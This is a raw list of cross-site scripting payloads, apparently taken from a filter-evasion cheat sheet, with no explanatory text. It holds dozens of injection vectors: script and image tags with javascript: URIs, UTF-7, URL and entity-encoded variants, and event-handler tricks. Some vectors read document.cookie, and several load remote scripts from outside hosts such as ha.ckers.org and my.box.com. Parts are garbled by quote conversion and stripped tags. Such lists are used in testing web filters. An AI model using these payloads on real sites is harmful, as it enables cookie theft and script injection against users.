SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”> <IMG SRC=`javascript:alert(\”RSnake says, ‘XSS’\”)`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=\”javascript:alert(‘XSS’);\”> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ”;!–\”<XSS>=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>\”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= alert(“XSS”)”> <alert(“XSS”);//< a=/XSS/alert(a.source) \”;alert(‘XSS’);// alert(“XSS”); ¼script¾alert(¢XSS¢)¼/script¾ @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* 
a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e); document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> TESTHTML5FORMACTION crosssitespt <!– <img src=" alert(1)”> alert(1)”> alert(1)”> ({0:#0=alert/#0#/#0#(123)}) ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)() {alert(1)};1 crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’) alert(1) +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie) alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))" />


alert(123);
alert(“XSS”);
alert(123)
alert(“hellox worldss”);
alert(“XSS”)
alert(“XSS”);
alert(‘XSS’)
“>alert(“XSS”)
alert(/XSS”)
alert(/XSS/)
alert(1)
‘; alert(1);
‘)alert(1);//
alert(1)




{font-family&colon;”

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

alert&lpar;1&rpar; {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

prompt(1)</ScRipT giveanswerhere=?

/*%00*/alert(1)/*%00*/</script /*%00*/

">

%00

<iframe/src="data:text/html,”>

</script

<script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

X


X</a

http://www.googlealert(document.location)</script

XYZ</a

<img/src=@ onerror = prompt('1')

<style/onload=prompt('XSS')

alert(String.fromCharCode(49))</script ^__^

/**/alert(document.location)/**/</script :-(

&#00;